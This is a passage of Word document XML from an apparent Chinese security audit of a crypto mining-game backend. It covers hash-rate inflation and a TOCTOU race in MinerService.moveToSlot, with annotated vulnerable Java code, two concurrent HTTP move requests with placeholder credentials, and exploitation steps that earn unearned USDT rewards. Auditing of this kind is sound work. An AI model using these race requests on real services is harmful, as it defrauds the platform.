          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 移动任意矿机）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 扫描所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录，10 台矿机全部计入；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="590"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被虚高值持久化到用户账户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="591"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>循环放大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="592"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>只要仓库中仍有矿机且能制造出空闲坑位，可重复执行步骤 1–3；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每轮净增 1 台部署矿机，多轮叠加后算力倍增，对应挖矿收益（金币、USDT 等）成比例虚增。</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：用户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 远高于正常值，在后续挖矿结算周期中获得超额奖励。</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594"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：是（需有效 Bearer Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：普通注册用户即可；仓库中有矿机则放大效果更显著</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596"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.move → MinerService.java.moveToSlot → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getBaseOutputForLevel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audit_m153_523_move_ctrl-path3of6.md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：MinerService.java#moveToSlot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_27" w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞26：并发矿机移动 TOCTOU 竞态条件导致坑位约束绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="597"/>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moveToSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 坑位占用检查与写入非原子——TOCTOU 竞态条件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="598"/>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src/main/java/com/gameBack/mjservice/service/MinerService.java:moveToSlot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="599"/>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竞态条件（TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="600"/>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601"/>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602"/>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r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>moveToSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法先调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot(userId, slotIdB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 检查目标坑位是否为空，再执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.save(miner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将矿机写入目标坑位。这两个步骤之间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有对目标坑位行加 `SELECT ... FOR UPDATE` 行锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，属于典型"先检查后写入（TOCTOU）"非原子操作。在 MySQL 默认 READ COMMITTED / REPEATABLE READ 隔离级别下，两个并发事务均能在对方提交前读到目标坑位为空，从而双双通过校验并各自完成写入，最终使同一坑位承载了两台矿机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="603"/>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604"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP 入口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/miner/move</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotIdB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来自请求体，攻击者可控（整数 1-9）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>moveToSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot(userId, slotIdB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 做"快照读"检查（无锁）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">紧接着 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.save(miner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 修改矿机坑位（此时不再校验坑位是否仍为空）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="607"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个并发请求 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>move(slotA→3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>move(slotB→3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均在对方提交前看到坑位 3 为空，均通过校验，均完成写入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="608"/>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609"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击成功后，slot1 和 slot2 原有的两台矿机均写入 slot3，slot1/slot2 变为"看似空闲"的坑位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者可再向已解锁的 slot1/slot2 填入新的（更高等级）矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="611"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">新矿机入槽后触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 若新矿机等级超过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，即触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，违规获取 USDT 升级奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">即使不触发升级奖励，多余矿机也被计入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，持续产生额外算力收益</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MoveMinerForm 可控字段：</w:t>
              <w:br/>
              <w:t>//   Integer slotIdA;  ← 源坑位</w:t>
              <w:br/>
              <w:t>//   Integer slotIdB;  ← 目标坑位（攻击者控制，两个并发请求共用同一值）</w:t>
              <w:br/>
              <w:t>@PostMapping("/move")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; move(@CurrentUserId Long userId, @RequestBody MoveMinerForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(minerService.moveToSlot(userId, form.getSlotIdA(), form.getSlotIdB())); // ← HTTP 可控入口</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞点：MinerService.java#moveToSlot</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner moveToSlot(Long userId, Integer slotIdA, Integer slotIdB) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!canPlaceInSlot(userId, slotIdB)) {               // ← 读取坑位状态（无行锁，快照读）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位未解锁或已被占用");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 两个并发事务在对方提交前均读到 slotIdB 为空，均通过此校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotIdA, 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("源坑位无矿机"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotIdB);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);                       // ← 写入，未重新验证坑位是否仍为空 → 漏洞点</w:t>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miner;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 坑位检查方法：MinerService.java#canPlaceInSlot</w:t>
              <w:br/>
              <w:t>public boolean canPlaceInSlot(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!isSlotUnlocked(userId, slotId)) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0).isEmpty(); // ← 无锁读，TOCTOU 根源</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同一账号同时发送以下两个请求（使用脚本并发发出，确保两者在各自事务提交前几乎同时到达服务器）：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/api/miner/move HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;用户有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;signAppKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_A&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;签名A&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotIdA": 1, "slotIdB": 3}</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/api/miner/move HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;用户有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;signAppKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_B&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;签名B&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotIdA": 2, "slotIdB": 3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>确保账号在坑位 1 和坑位 2 各有一台矿机，坑位 3 为空（已解锁）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用多线程脚本同时发送 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>move(1→3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>move(2→3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 两个请求，使它们在同一时间窗口内并发执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="615"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>竞态成功后，查询坑位状态可见坑位 3 有两台矿机，坑位 1 和坑位 2 变为空闲</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="616"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">向坑位 1、2 投入仓库中更高等级的矿机（通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
